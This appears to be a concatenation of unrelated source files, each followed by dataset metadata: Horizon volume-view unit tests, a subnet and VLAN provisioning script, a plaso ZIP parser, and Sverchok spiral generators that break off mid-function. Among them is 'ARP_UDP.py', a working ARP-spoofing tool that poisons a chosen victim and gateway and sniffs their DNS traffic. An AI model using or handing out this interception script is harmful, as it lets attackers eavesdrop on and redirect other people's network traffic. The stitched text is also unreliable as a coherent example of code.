'disk_format': 'raw'}
mock_schemas_list.return_value = self.image_schemas.first()
mock_get.return_value = volume
mock_upload.return_value = loaded_resp
url = reverse('horizon:project:volumes:upload_to_image',
args=[volume.id])
res = self.client.post(url, form_data)
self.assertNoFormErrors(res)
self.assertMessageCount(info=1)
redirect_url = INDEX_URL
self.assertRedirectsNoFollow(res, redirect_url)
mock_get.assert_called_once_with(test.IsHttpRequest(), volume.id)
mock_upload.assert_called_once_with(test.IsHttpRequest(),
form_data['id'],
form_data['force'],
form_data['image_name'],
form_data['container_format'],
form_data['disk_format'])
@mock.patch.object(quotas, 'tenant_quota_usages')
@mock.patch.object(cinder, 'volume_extend')
@mock.patch.object(cinder, 'volume_get')
def test_extend_volume(self, mock_get, mock_extend, mock_quotas):
volume = self.cinder_volumes.first()
formData = {'name': 'A Volume I Am Making',
'orig_size': volume.size,
'new_size': 120}
mock_get.return_value = volume
mock_quotas.return_value = self.cinder_quota_usages.first()
mock_extend.return_value = volume
url = reverse('horizon:project:volumes:extend',
args=[volume.id])
res = self.client.post(url, formData)
redirect_url = INDEX_URL
self.assertRedirectsNoFollow(res, redirect_url)
mock_get.assert_called_once_with(test.IsHttpRequest(), volume.id)
mock_quotas.assert_called_once()
mock_extend.assert_called_once_with(test.IsHttpRequest(), volume.id,
formData['new_size'])
@mock.patch.object(quotas, 'tenant_quota_usages')
@mock.patch.object(cinder, 'volume_get')
def test_extend_volume_with_wrong_size(self, mock_get, mock_quotas):
volume = self.cinder_volumes.first()
formData = {'name': 'A Volume I Am Making',
'orig_size': volume.size,
'new_size': 10}
mock_get.return_value = volume
mock_quotas.return_value = self.cinder_quota_usages.first()
url = reverse('horizon:project:volumes:extend',
args=[volume.id])
res = self.client.post(url, formData)
self.assertFormErrors(res, 1,
"New size must be greater than "
"current size.")
mock_get.assert_called_once_with(test.IsHttpRequest(), volume.id)
mock_quotas.assert_called_once()
@mock.patch.object(quotas, 'tenant_quota_usages')
@mock.patch.object(cinder, 'tenant_absolute_limits')
@mock.patch.object(cinder, 'volume_get')
def test_retype_volume_supported_action_item(self, mock_get,
mock_limits, mock_quotas):
volume = self.cinder_volumes.get(name='v2_volume')
limits = self.cinder_limits['absolute']
mock_get.return_value = volume
mock_limits.return_value = limits
mock_quotas.return_value = self.cinder_quota_usages.first()
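        # Ask the volumes table to re-render a single row via AJAX and check that
        # the retype ("Change Volume Type") action is offered for this volume.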
url = (INDEX_URL +
"?action=row_update&table=volumes&obj_id=" + volume.id)
res = self.client.get(url, {}, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(res.status_code, 200)
self.assertContains(res, 'Change Volume Type')
self.assertContains(res, 'retype')
mock_get.assert_called_once_with(test.IsHttpRequest(), volume.id)
mock_quotas.assert_called_once_with(test.IsHttpRequest(),
targets=('volumes', 'gigabytes'))
self.assert_mock_multiple_calls_with_same_arguments(
mock_limits, 2,
mock.call(test.IsHttpRequest()))
@test.create_mocks({
cinder: ['volume_type_list',
'volume_retype',
'volume_get']
})
def test_retype_volume(self):
volume = self.cinder_volumes.get(name='my_volume2')
volume_type = self.cinder_volume_types.get(name='vol_type_1')
form_data = {'id': volume.id,
'name': volume.name,
'volume_type': volume_type.name,
'migration_policy': 'on-demand'}
self.mock_volume_get.return_value = volume
self.mock_volume_type_list.return_value = \
self.cinder_volume_types.list()
self.mock_volume_retype.return_value = True
url = reverse('horizon:project:volumes:retype',
args=[volume.id])
res = self.client.post(url, form_data)
self.assertNoFormErrors(res)
redirect_url = INDEX_URL
self.assertRedirectsNoFollow(res, redirect_url)
self.mock_volume_get.assert_called_once_with(test.IsHttpRequest(),
volume.id)
self.mock_volume_type_list.assert_called_once()
self.mock_volume_retype.assert_called_once_with(
test.IsHttpRequest(), volume.id,
form_data['volume_type'], form_data['migration_policy'])
def test_encryption_false(self):
self._test_encryption(False)
def test_encryption_true(self):
self._test_encryption(True)
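    # Shared helper for the two tests above: render the volume index with every
    # volume flagged as (un)encrypted and check the "Encrypted" column value.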
@test.create_mocks({
api.nova: ['server_list'],
cinder: ['volume_backup_supported',
'volume_list_paged',
'volume_snapshot_list',
'tenant_absolute_limits'],
})
def _test_encryption(self, encryption):
volumes = self.cinder_volumes.list()
for volume in volumes:
volume.encrypted = encryption
limits = self.cinder_limits['absolute']
self.mock_volume_backup_supported.return_value = False
self.mock_volume_list_paged.return_value = [self.cinder_volumes.list(),
False, False]
self.mock_volume_snapshot_list.return_value = \
self.cinder_volume_snapshots.list()
self.mock_server_list.return_value = [self.servers.list(), False]
self.mock_tenant_absolute_limits.return_value = limits
res = self.client.get(INDEX_URL)
rows = res.context['volumes_table'].get_rows()
column_value = 'Yes' if encryption else 'No'
for row in rows:
self.assertEqual(row.cells['encryption'].data, column_value)
self.assertEqual(10, self.mock_volume_backup_supported.call_count)
self.mock_volume_list_paged.assert_called_once_with(
test.IsHttpRequest(), marker=None,
sort_dir='desc', search_opts=None,
paginate=True)
self.mock_volume_snapshot_list.assert_called_once_with(
test.IsHttpRequest(), search_opts=None)
self.assertEqual(13, self.mock_tenant_absolute_limits.call_count)
@mock.patch.object(quotas, 'tenant_quota_usages')
@mock.patch.object(cinder, 'volume_get')
def test_extend_volume_with_size_out_of_quota(self, mock_get, mock_quotas):
volume = self.cinder_volumes.first()
usage_limit = self.cinder_quota_usages.first()
usage_limit.add_quota(api.base.Quota('gigabytes', 100))
usage_limit.tally('gigabytes', 20)
usage_limit.tally('volumes', len(self.cinder_volumes.list()))
formData = {'name': 'A Volume I Am Making',
'orig_size': volume.size,
'new_size': 1000}
mock_quotas.return_value = usage_limit
mock_get.return_value = volume
url = reverse('horizon:project:volumes:extend',
args=[volume.id])
res = self.client.post(url, formData)
self.assertFormError(res, "form", "new_size",
"Volume cannot be extended to 1000GiB as "
"the maximum size it can be extended to is "
"120GiB.")
mock_get.assert_called_once_with(test.IsHttpRequest(), volume.id)
self.assertEqual(2, mock_quotas.call_count)
@test.create_mocks({
api.nova: ['server_list'],
cinder: ['volume_backup_supported',
'volume_list_paged',
'volume_snapshot_list',
'tenant_absolute_limits'],
})
def test_create_transfer_availability(self):
limits = self.cinder_limits['absolute']
self.mock_volume_backup_supported.return_value = False
self.mock_volume_list_paged.return_value = [self.cinder_volumes.list(),
False, False]
self.mock_volume_snapshot_list.return_value = []
self.mock_server_list.return_value = [self.servers.list(), False]
self.mock_tenant_absolute_limits.return_value = limits
res = self.client.get(INDEX_URL)
table = res.context['volumes_table']
# Verify that the create transfer action is present if and only if
# the volume is available
for vol in table.data:
actions = [a.name for a in table.get_row_actions(vol)]
self.assertEqual('create_transfer' in actions,
vol.status == 'available')
self.assertEqual(10, self.mock_volume_backup_supported.call_count)
self.mock_volume_list_paged.assert_called_once_with(
test.IsHttpRequest(), marker=None,
sort_dir='desc', search_opts=None,
paginate=True)
self.mock_volume_snapshot_list.assert_called_once_with(
test.IsHttpRequest(), search_opts=None)
self.mock_server_list.assert_called_once_with(test.IsHttpRequest(),
search_opts=None)
self.assertEqual(13, self.mock_tenant_absolute_limits.call_count)
@mock.patch.object(cinder, 'transfer_get')
@mock.patch.object(cinder, 'transfer_create')
def test_create_transfer(self, mock_transfer_create, mock_transfer_get):
volumes = self.cinder_volumes.list()
volToTransfer = [v for v in volumes if v.status == 'available'][0]
formData = {'volume_id': volToTransfer.id,
'name': 'any transfer name'}
transfer = self.cinder_volume_transfers.first()
mock_transfer_create.return_value = transfer
mock_transfer_get.return_value = transfer
# Create a transfer for the first available volume
url = reverse('horizon:project:volumes:create_transfer',
args=[volToTransfer.id])
res = self.client.post(url, formData)
self.assertNoFormErrors(res)
mock_transfer_create.assert_called_once_with(test.IsHttpRequest(),
formData['volume_id'],
formData['name'])
mock_transfer_get.assert_called_once_with(test.IsHttpRequest(),
transfer.id)
@test.create_mocks({
api.nova: ['server_list'],
cinder: ['volume_backup_supported',
'volume_list_paged',
'volume_snapshot_list',
'transfer_delete',
'tenant_absolute_limits'],
})
def test_delete_transfer(self):
transfer = self.cinder_volume_transfers.first()
volumes = []
# Attach the volume transfer to the relevant volume
for v in self.cinder_volumes.list():
if v.id == transfer.volume_id:
v.status = 'awaiting-transfer'
v.transfer = transfer
volumes.append(v)
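        # Horizon table actions are posted as "<table>__<action>__<object id>".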
formData = {'action':
'volumes__delete_transfer__%s' % transfer.volume_id}
self.mock_volume_backup_supported.return_value = False
self.mock_volume_list_paged.return_value = [volumes, False, False]
self.mock_volume_snapshot_list.return_value = []
self.mock_server_list.return_value = [self.servers.list(), False]
self.mock_tenant_absolute_limits.return_value = \
self.cinder_limits['absolute']
url = INDEX_URL
res = self.client.post(url, formData, follow=True)
self.assertNoFormErrors(res)
self.assertIn('Successfully deleted volume transfer "test transfer"',
[m.message for m in res.context['messages']])
self.assertEqual(5, self.mock_volume_backup_supported.call_count)
self.mock_volume_list_paged.assert_called_once_with(
test.IsHttpRequest(), marker=None,
search_opts=None, sort_dir='desc',
paginate=True)
self.mock_volume_snapshot_list.assert_called_once_with(
test.IsHttpRequest(), search_opts=None)
self.mock_transfer_delete.assert_called_once_with(test.IsHttpRequest(),
transfer.id)
self.mock_server_list.assert_called_once_with(test.IsHttpRequest(),
search_opts=None)
self.assertEqual(8, self.mock_tenant_absolute_limits.call_count)
@test.create_mocks({
api.nova: ['server_list'],
cinder: ['volume_list_paged',
'volume_snapshot_list',
'tenant_absolute_limits',
'transfer_accept']
})
def test_accept_transfer(self):
transfer = self.cinder_volume_transfers.first()
self.mock_tenant_absolute_limits.return_value = \
self.cinder_limits['absolute']
formData = {'transfer_id': transfer.id, 'auth_key': transfer.auth_key}
url = reverse('horizon:project:volumes:accept_transfer')
res = self.client.post(url, formData, follow=True)
self.assertNoFormErrors(res)
self.mock_transfer_accept.assert_called_once_with(test.IsHttpRequest(),
transfer.id,
transfer.auth_key)
self.assertEqual(3, self.mock_tenant_absolute_limits.call_count)
self.mock_server_list.assert_called_once()
self.mock_volume_list_paged.assert_called_once()
self.mock_volume_snapshot_list.assert_called_once()
self.mock_transfer_accept.assert_called_once()
@mock.patch.object(cinder, 'transfer_get')
def test_download_transfer_credentials(self, mock_transfer):
transfer = self.cinder_volume_transfers.first()
filename = "{}.txt".format(slugify(transfer.id))
url = reverse('horizon:project:volumes:'
'download_transfer_creds',
kwargs={'transfer_id': transfer.id,
'auth_key': transfer.auth_key})
res = self.client.get(url)
self.assertTrue(res.has_header('content-disposition'))
self.assertTrue(res.has_header('content-type'))
self.assertEqual(res.get('content-disposition'),
'attachment; filename={}'.format(filename))
self.assertEqual(res.get('content-type'), 'application/text')
self.assertIn(transfer.id, res.content.decode('utf-8'))
self.assertIn(transfer.auth_key, res.content.decode('utf-8'))
mock_transfer.assert_called_once_with(test.IsHttpRequest(),
transfer.id)
@test.create_mocks({
api.nova: ['server_list'],
cinder: ['volume_backup_supported',
'volume_list_paged',
'volume_snapshot_list',
'tenant_absolute_limits',
'volume_get'],
})
def test_create_backup_availability(self):
limits = self.cinder_limits['absolute']
self.mock_volume_backup_supported.return_value = True
self.mock_volume_list_paged.return_value = [self.cinder_volumes.list(),
False, False]
self.mock_volume_snapshot_list.return_value = []
self.mock_server_list.return_value = [self.servers.list(), False]
self.mock_tenant_absolute_limits.return_value = limits
res = self.client.get(INDEX_URL)
table = res.context['volumes_table']
# Verify that the create backup action is present if and only if
# the volume is available or in-use
for vol in table.data:
actions = [a.name for a in table.get_row_actions(vol)]
self.assertEqual('backups' in actions,
vol.status in ('available', 'in-use'))
self.assertEqual(10, self.mock_volume_backup_supported.call_count)
self.mock_volume_list_paged.assert_called_once_with(
test.IsHttpRequest(), marker=None,
sort_dir='desc', search_opts=None,
paginate=True)
self.mock_volume_snapshot_list.assert_called_once_with(
test.IsHttpRequest(), search_opts=None)
self.mock_server_list.assert_called_once_with(test.IsHttpRequest(),
search_opts=None)
self.assertEqual(13, self.mock_tenant_absolute_limits.call_count)
|
apache-2.0
| 5,897,069,910,118,493,000
| 44.455019
| 79
| 0.577588
| false
| 4.073708
| true
| false
| false
|
efimlosev/corpcolo
|
noc-ps/add_server.py
|
1
|
2912
|
from json_p_n import sendRecieve
import pexpect,argparse
from sys import path
import subprocess
path.append('/home/efim/Dropbox')
from ipcalc_flask import calculateSubnet as calc
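# Helper script: create a subnet in the provisioning backend, point an existing
# host record at it and push the VLAN change to the switch port the host is on.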
def Main():
parser = argparse.ArgumentParser()
    parser.add_argument('subnet', help='Give me a subnet', type=str) #optional argument
parser.add_argument('vlan', help='We need a vlan here', type=str) #the same
parser.add_argument('desc', help='We need a description here', type=str) #the same
parser.add_argument('hostname', nargs='?', help='We need a hostname here', type=str) #the same
parser.add_argument('-i', help='We need an Ip here', type=str) #the same
args = parser.parse_args()
temp = addUrl(args.subnet,args.vlan,args.desc)
temp1 = getAllinformationWeWantiToUpdate(temp,{'hostname': args.hostname},args.i)
updateHost(temp1,args.vlan,args.desc)
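# Create the subnet via the JSON-RPC backend and return the first usable IP plus
# the server name and description suffix parsed out of 'desc'.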
def addUrl(subnet,vlan,desc):
tmp = calc(subnet)
sub = str(tmp[0])
gw = str(tmp[1])
ip = str(tmp[2]).split(' - ')[0]
nm = str(tmp[3])
servername, descrend = desc.split(' ')
tmp = None
tmp = sendRecieve('addSubnet',{'subnet': sub, 'gateway': gw, 'netmask': nm, 'vlan' : vlan, 'description': desc})
print tmp['result']['success']
ipSub = { 'ip':ip, 'subnet': sub, 'descrend' : descrend, 'servername' : servername }
return ipSub
def getAllinformationWeWantiToUpdate(ipsub,hostname,ip=None):
ipsub.update(hostname)
if ip != None:
ipsub['ip'] = ip
# print ipsub
return ipsub
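# Find the host record matching the server name, merge in the new ip/subnet/hostname,
# rewrite its description, update the host and reconfigure its switch port for the VLAN.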
def updateHost(whatWeWantToUpdate,vlan,desc ):
hosts = sendRecieve("searchHosts", {'start': 0, 'limit': 100, 'query': whatWeWantToUpdate['servername'] })['result']['data']
exactHost = [ host for host in hosts if host['descr'].split('(')[0] == whatWeWantToUpdate['servername']]
#print exactHost[0]['descr']
for k,v in exactHost[0].iteritems():
if k in whatWeWantToUpdate:
exactHost[0][k] = whatWeWantToUpdate[k]
exactHost[0]['descr'] = str(exactHost[0]['descr'].split(')')[0] + ')' + whatWeWantToUpdate['descrend'])
print exactHost[0]['pool']
connection = sendRecieve("getConnectionsByHost", exactHost[0]['mac'])['result']['data']
switchName = connection[0]['devname']
switchPort = connection[0]['portdescr'].split(' ')[1].split('[')[1].split(']')[0]
devices = sendRecieve("getDevices", 0, 1000)['result']['data']
switchIp = [device['ip'] for device in devices if device['name'] == switchName ][0]
if exactHost[0]['pool'] != 16:
print 'Something went wrong, exitting!'
exit()
print sendRecieve("getConnectionsByHost", exactHost[0]['mac'])
print exactHost[0]['ip']
print sendRecieve("updateHost", exactHost[0])
subprocess.check_call(['/home/efim/Dropbox/sshs_rem.sh', switchIp, switchPort, vlan, desc])
if __name__ == '__main__':
Main()
#updateHost('710A6R22', {'descr': 'test'})
|
gpl-2.0
| -1,418,926,991,163,073,500
| 40.6
| 127
| 0.650755
| false
| 3.228381
| false
| false
| false
|
Dylan-halls/Network-Exploitation-Toolkit
|
PacketBlocker/ARP_UDP.py
|
1
|
2931
|
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
import threading
from termcolor import colored
os.system("clear")
print("""
____ ___________ __________
| | \______ ______ )
| | /| | \| ___)
| | / | ` \ |
|______/ /_______ /____|
\/
""")
os.system('echo 0 > /proc/sys/net/ipv4/ip_forward')
VIP = input("\nVictim: ")
GW = input("Gateway: ")
IFACE = input("Interface: ")
GW = str(GW)
VIP = str(VIP)
IFACE = str(IFACE)
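# Print a summary of every sniffed UDP packet: addresses, ports, length, checksum,
# the raw payload (if any) and a full hex dump.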
def pkthandler(pkt):
try:
ip = pkt[IP]
except IndexError:
pass
try:
src = ip.src
dst = ip.dst
except UnboundLocalError:
pass
if pkt.haslayer(UDP):
udp = pkt[UDP]
print("--------------------------------------------------------\n\n")
print(" .:{}:. ".format(colored('UDP','red')))
print(" ")
print(" \033[1;36mSource IP:\033[00m {} \033[1;36mDestination IP:\033[00m {}".format(src, dst))
print(" \033[1;36mSource Port:\033[00m {} \033[1;36mDestination Port:\033[00m {}".format(udp.sport, udp.dport))
print(" \033[1;36mLength:\033[00m {} ".format(udp.len))
print(" \033[1;36mChecksum:\033[00m {} ".format(udp.chksum))
rawLoad = pkt.getlayer(Raw)
if rawLoad == None: pass
else:
print(" \033[1;36mRaw:\n\n\033[00m {} ".format(rawLoad))
print(" ")
print(" ")
hexdump(pkt)
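# ARP cache poisoning: keep telling the victim that we are the gateway (v_poison)
# and the gateway that we are the victim (gw_poison), so the traffic sniffed below
# flows through this host.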
def v_poison():
v = ARP(pdst=VIP, psrc=GW,)
while True:
try:
send(v,verbose=0,inter=1,loop=1)
        except KeyboardInterrupt: # Functions constructing and sending the ARP packets
sys.exit(1)
def gw_poison():
gw = ARP(pdst=GW, psrc=VIP)
while True:
try:
send(gw,verbose=0,inter=1,loop=1)
        except KeyboardInterrupt:
sys.exit(1)
def format_muti_lines(prefix, string, size=80):
size -= len(prefix)
if isinstance(string, bytes):
string = ''.join(r'\x{:02x}'.format(byte) for byte in string)
if size % 2:
size -= 1
return '\n'.join([prefix + line for line in textwrap.wrap(string, size)])
vthread = []
gwthread = []
while True: # Threads
vpoison = threading.Thread(target=v_poison)
vpoison.setDaemon(True)
vthread.append(vpoison)
vpoison.start()
gwpoison = threading.Thread(target=gw_poison)
gwpoison.setDaemon(True)
gwthread.append(gwpoison)
gwpoison.start()
try:
pkt = sniff(iface=str(IFACE),filter='udp port 53',prn=pkthandler)
except KeyboardInterrupt:
os.system("{ cd ..; python3 net.py; }")
exit(0)
if __name__ == "__main__":
UDP()
|
mit
| -8,585,580,230,848,259,000
| 26.92381
| 118
| 0.493347
| false
| 3.293258
| false
| false
| false
|
rgayon/plaso
|
plaso/parsers/czip.py
|
1
|
2615
|
# -*- coding: utf-8 -*-
"""This file contains a parser for compound ZIP files."""
from __future__ import unicode_literals
import struct
import zipfile
from plaso.lib import errors
from plaso.parsers import interface
from plaso.parsers import logger
from plaso.parsers import manager
class CompoundZIPParser(interface.FileObjectParser):
"""Shared functionality for parsing compound zip files.
Compound zip files are zip files used as containers to create another file
format, as opposed to archives of unrelated files.
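  Typical examples are OOXML (.docx) and OpenDocument (.odt) documents.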
"""
NAME = 'czip'
DATA_FORMAT = 'Compound ZIP file'
_plugin_classes = {}
def ParseFileObject(self, parser_mediator, file_object):
"""Parses a compound ZIP file-like object.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
file_object (dfvfs.FileIO): a file-like object.
Raises:
UnableToParseFile: when the file cannot be parsed.
"""
display_name = parser_mediator.GetDisplayName()
if not zipfile.is_zipfile(file_object):
raise errors.UnableToParseFile(
'[{0:s}] unable to parse file: {1:s} with error: {2:s}'.format(
self.NAME, display_name, 'Not a Zip file.'))
try:
zip_file = zipfile.ZipFile(file_object, 'r', allowZip64=True)
self._ProcessZipFileWithPlugins(parser_mediator, zip_file)
zip_file.close()
# Some non-ZIP files return true for is_zipfile but will fail with a
# negative seek (IOError) or another error.
except (zipfile.BadZipfile, struct.error) as exception:
raise errors.UnableToParseFile(
'[{0:s}] unable to parse file: {1:s} with error: {2!s}'.format(
self.NAME, display_name, exception))
def _ProcessZipFileWithPlugins(self, parser_mediator, zip_file):
"""Processes a zip file using all compound zip files.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
zip_file (zipfile.ZipFile): the zip file. It should not be closed in
this method, but will be closed in ParseFileObject().
"""
archive_members = zip_file.namelist()
for plugin in self._plugins:
try:
plugin.UpdateChainAndProcess(
parser_mediator, zip_file=zip_file, archive_members=archive_members)
except errors.WrongCompoundZIPPlugin as exception:
logger.debug('[{0:s}] wrong plugin: {1!s}'.format(
self.NAME, exception))
manager.ParsersManager.RegisterParser(CompoundZIPParser)
|
apache-2.0
| 3,504,794,705,852,098,000
| 33.407895
| 80
| 0.690631
| false
| 3.926426
| false
| false
| false
|
DolphinDream/sverchok
|
nodes/generators_extended/spiral_mk2.py
|
1
|
22191
|
# ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
import bpy
from bpy.props import IntProperty, FloatProperty, BoolProperty, EnumProperty
from math import sin, cos, pi, sqrt, exp, atan, log
import re
from sverchok.node_tree import SverchCustomTreeNode
from sverchok.data_structure import updateNode, match_long_repeat, get_edge_list
from sverchok.utils.sv_easing_functions import *
from sverchok.utils.sv_transform_helper import AngleUnits, SvAngleHelper
PHI = (sqrt(5) + 1) / 2 # the golden ratio
PHIPI = 2 * log(PHI) / pi # exponent for the Fibonacci (golden) spiral
spiral_type_items = [
("ARCHIMEDEAN", "Archimedean", "Generate an archimedean spiral.", 0),
("LOGARITHMIC", "Logarithmic", "Generate a logarithmic spiral.", 1),
("SPHERICAL", "Spherical", "Generate a spherical spiral.", 2),
("OVOIDAL", "Ovoidal", "Generate an ovoidal spiral.", 3),
("CORNU", "Cornu", "Generate a cornu spiral.", 4),
("EXO", "Exo", "Generate an exo spiral.", 5),
("SPIRANGLE", "Spirangle", "Generate a spirangle spiral.", 6)
]
# name : [ preset index, type, eR, iR, exponent, turns, resolution, scale, height ]
spiral_presets = {
" ": (0, "", 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0),
# archimedean spirals
"ARCHIMEDEAN": (10, "ARCHIMEDEAN", 1.0, 0.0, 1.0, 7, 100, 1.0, 0.0),
"PARABOLIC": (11, "ARCHIMEDEAN", 1.0, 0.0, 2.0, 5, 100, 1.0, 0.0),
"HYPERBOLIC": (12, "ARCHIMEDEAN", 1.0, 0.0, -1.0, 11, 100, 1.0, 0.0),
"LITUUS": (13, "ARCHIMEDEAN", 1.0, 0.0, -2.0, 11, 100, 1.0, 0.0),
# logarithmic spirals
"FIBONACCI": (20, "LOGARITHMIC", 1.0, 0.5, PHIPI, 3, 100, 1.0, 0.0),
# 3D spirals (mix type)
"CONICAL": (30, "ARCHIMEDEAN", 1.0, 0.0, 1.0, 7, 100, 1.0, 3.0),
"HELIX": (31, "LOGARITHMIC", 1.0, 0.0, 0.0, 7, 100, 1.0, 4.0),
"SPHERICAL": (32, "SPHERICAL", 1.0, 0.0, 0.0, 11, 55, 1.0, 0.0),
"OVOIDAL": (33, "OVOIDAL", 5.0, 1.0, 0.0, 7, 55, 1.0, 6.0),
    # spiral oddities
"CORNU": (40, "CORNU", 1.0, 1.0, 1.0, 5, 55, 1.0, 0.0),
"EXO": (41, "EXO", 1.0, 0.1, PHI, 11, 101, 1.0, 0.0),
# choppy spirals
"SPIRANGLE SC": (50, "SPIRANGLE", 1.0, 0.0, 0.0, 8, 4, 1.0, 0.0),
"SPIRANGLE HX": (51, "SPIRANGLE", 1.0, 0.0, 0.5, 7, 6, 1.0, 0.)
}
normalize_items = [
("ER", "eR", "Normalize spiral to the external radius.", 0),
("IR", "iR", "Normalize spiral to the internal radius.", 1)
]
def make_archimedean_spiral(settings):
'''
eR : exterior radius (end radius)
iR : interior radius (start radius)
exponent : rate of growth (between iR and eR)
turns : number of turns in the spiral
N : curve resolution per turn
scale : overall scale of the curve
height : the height of the spiral along z
phase : phase the spiral around its center
flip : flip the spiral direction (default is CLOCKWISE)
'''
eR, iR, exponent, turns, N, scale, height, phase, flip = settings
sign = -1 if flip else 1 # flip direction ?
max_phi = 2 * pi * turns * sign
epsilon = 1e-5 if exponent < 0 else 0 # to avoid raising zero to negative power
exponent = 1e-2 if exponent == 0 else exponent # to avoid division by zero
dR = eR - iR # radius range : cached for performance
ex = 1 / exponent # inverse exponent : cached for performance
N = N * turns # total number of points in the spiral
verts = []
norms = []
add_vert = verts.append
add_norm = norms.append
for n in range(N + 1):
t = n / N # t : [0, 1]
phi = max_phi * t + phase
r = (iR + dR * (t + epsilon) ** ex) * scale # essentially: r = a * t ^ (1/b)
x = r * cos(phi)
y = r * sin(phi)
z = height * t
add_vert([x, y, z])
edges = get_edge_list(N)
return verts, edges, norms
def make_logarithmic_spiral(settings):
'''
eR : exterior radius
iR : interior radius
exponent : rate of growth
turns : number of turns in the spiral
N : curve resolution per turn
scale : overall scale of the curve
height : the height of the spiral along z
phase : phase the spiral around its center
flip : flip the spiral direction (default is CLOCKWISE)
'''
eR, iR, exponent, turns, N, scale, height, phase, flip = settings
sign = -1 if flip else 1 # flip direction ?
max_phi = 2 * pi * turns
N = N * turns # total number of points in the spiral
verts = []
norms = []
add_vert = verts.append
add_norm = norms.append
for n in range(N + 1):
t = n / N # t : [0, 1]
phi = max_phi * t
r = eR * exp(exponent * phi) * scale # essentially: r = a * e ^ (b*t)
pho = phi * sign + phase # final angle : cached for performance
x = r * sin(pho)
y = r * cos(pho)
z = height * t
add_vert([x, y, z])
edges = get_edge_list(N)
return verts, edges, norms
def make_spherical_spiral(settings):
'''
    This is the approximate spherical spiral that has a finite length,
where the phi & theta angles sweep their ranges at constant rates.
eR : exterior radius
iR : interior radius (UNUSED)
exponent : rate of growth (sigmoid in & out)
turns : number of turns in the spiral
N : the curve resolution of one turn
scale : overall scale of the curve
height : the height of the spiral along z (UNUSED)
phase : phase the spiral around its center
flip : flip the spiral direction (default is CLOCKWISE)
'''
eR, iR, exponent, turns, N, scale, height, phase, flip = settings
sign = -1 if flip else 1 # flip direction ?
max_phi = 2 * pi * turns * sign
N = N * turns # total number of points in the spiral
es = prepareExponentialSettings(2, exponent + 1e-5) # used for easing
verts = []
norms = []
add_vert = verts.append
add_norm = norms.append
for n in range(N + 1):
t = n / N # t : [0, 1]
phi = max_phi * t + phase
a = ExponentialEaseInOut(t, es) # ease theta variation
theta = -pi / 2 + pi * a
RxCosTheta = (iR + eR * cos(theta)) * scale # cached for performance
x = cos(phi) * RxCosTheta
y = sin(phi) * RxCosTheta
z = eR * sin(theta)
add_vert([x, y, z])
edges = get_edge_list(N)
return verts, edges, norms
def make_ovoidal_spiral(settings):
'''
eR : exterior radius (vertical cross section circles)
iR : interior radius (horizontal cross section circle)
exponent : rate of growth (sigmoid in & out)
turns : number of turns in the spiral
N : the curve resolution of one turn
scale : overall scale of the curve
height : the height of the spiral along z
phase : phase the spiral around its center
flip : flip the spiral direction (default is CLOCKWISE)
'''
eR, iR, exponent, turns, N, scale, height, phase, flip = settings
sign = -1 if flip else 1 # flip direction ?
max_phi = 2 * pi * turns * sign
# derive eR based on iR and height (the main parameters)
# eR = [iR - (H/2)^2/iR]/2 ::: H = 2 * sqrt(2*iR*eR - iR*iR)
eR = 0.5 * (iR + 0.25 * height * height / iR)
eR2 = eR * eR # cached for performance
dR = eR - iR # cached for performance
N = N * turns # total number of points in the spiral
es = prepareExponentialSettings(2, exponent + 1e-5) # used for easing
verts = []
norms = []
add_vert = verts.append
add_norm = norms.append
for n in range(N + 1):
t = n / N # t : [0, 1]
phi = max_phi * t + phase
a = ExponentialEaseInOut(t, es) # ease theta variation
theta = -pi / 2 + pi * a
h = 0.5 * height * sin(theta) # [-H/2, +H/2]
r = sqrt(eR2 - h * h) - dR # [0 -> iR -> 0]
x = r * cos(phi) * scale
y = r * sin(phi) * scale
z = h * scale
add_vert([x, y, z])
edges = get_edge_list(N)
return verts, edges, norms
def make_cornu_spiral(settings):
'''
L : length
N : resolution
S : scale
M :
x(t) = s * Integral(0,t) { cos(pi*u*u/2) du }
y(t) = s * Integral(0,t) { sin(pi*u*u/2) du }
TODO : refine the math (smoother curve, adaptive res, faster computation)
'''
eR, iR, exponent, turns, N, scale, height, phase, flip = settings
sign = -1 if flip else 1 # flip direction ?
N = N * turns # total number of points in the spiral
L = iR * turns # length
S = eR * scale # overall scale
es = prepareExponentialSettings(2, exponent + 1e-5) # used for easing
    verts1 = [] # positive spiral verts
    verts2 = [] # negative spiral verts
norms = []
add_vert1 = verts1.append
add_vert2 = verts2.append
add_norm = norms.append
l1 = 0
x = 0
y = 0
for n in range(N + 1):
t = n / N # t = [0,1]
a = QuadraticEaseOut(t)
# a = ExponentialEaseOut(t, es)
l = L * a # l = [0, +L]
r = x * x + y * y
# print("r=", r)
# M = 100 + int(300 * pow(r, exponent)) # integral steps
M = 100 + int(100 * a) # integral steps
l2 = l
# integral from l1 to l2
u = l1
du = (l2 - l1) / M
for m in range(M + 1):
u = u + du # u = [l1, l2]
phi = u * u * pi / 2
x = x + cos(phi) * du
y = y + sin(phi) * du
l1 = l2
# scale and flip
xx = x * S
yy = y * S * sign
# rotate by phase amount
px = xx * cos(phase) - yy * sin(phase)
py = xx * sin(phase) + yy * cos(phase)
pz = height * t
add_vert1([px, py, pz]) # positive spiral verts
        add_vert2([-px, -py, -pz]) # negative spiral verts
verts = verts2[::-1] + verts1
edges = get_edge_list(N)
return verts, edges, norms
def make_exo_spiral(settings):
'''
This is an exponential in & out between two circles
eR : exterior radius
iR : interior radius
exponent : rate of growth (SIGMOID : exponential in & out)
turns : number of turns in the spiral
N : the curve resolution of one turn
scale : overall scale of the curve
height : the height of the spiral along z
phase : phase the spiral around its center
flip : flip the spiral direction (default is CLOCKWISE)
'''
eR, iR, exponent, turns, N, scale, height, phase, flip = settings
sign = 1 if flip else -1 # flip direction ?
max_phi = 2 * pi * turns * sign
